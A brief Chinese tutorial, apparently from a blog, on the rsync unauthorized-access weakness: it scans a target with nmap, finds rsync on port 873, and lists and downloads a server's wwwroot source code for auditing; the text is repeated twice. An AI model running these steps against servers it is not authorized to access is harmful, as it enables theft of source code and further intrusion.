端口号:873
通过nmap 扫描目标开放端口
nmap扫描端口
可以看到873端口开放了rsync服务
rsync ip:: //查看文件目录
目录为wwwroot
rsync ip::wwwroot //进入wwwroot目录
获取wwwroot下目录
rsync -avz ip::wwwroot/目录 /root/本机目录 //下载源码到本地
下载后进行代码审计
-avz下载源代码
端口号:873
通过nmap 扫描目标开放端口
nmap扫描端口
可以看到873端口开放了rsync服务
rsync ip:: //查看文件目录
目录为wwwroot
rsync ip::wwwroot //进入wwwroot目录
获取wwwroot下目录
rsync -avz ip::wwwroot/目录 /root/本机目录 //下载源码到本地
下载后进行代码审计
-avz下载源代码
本文标题:rsync未授权访问漏洞
本文链接:https://www.haomeiwen.com/subject/xqzjextx.html
网友评论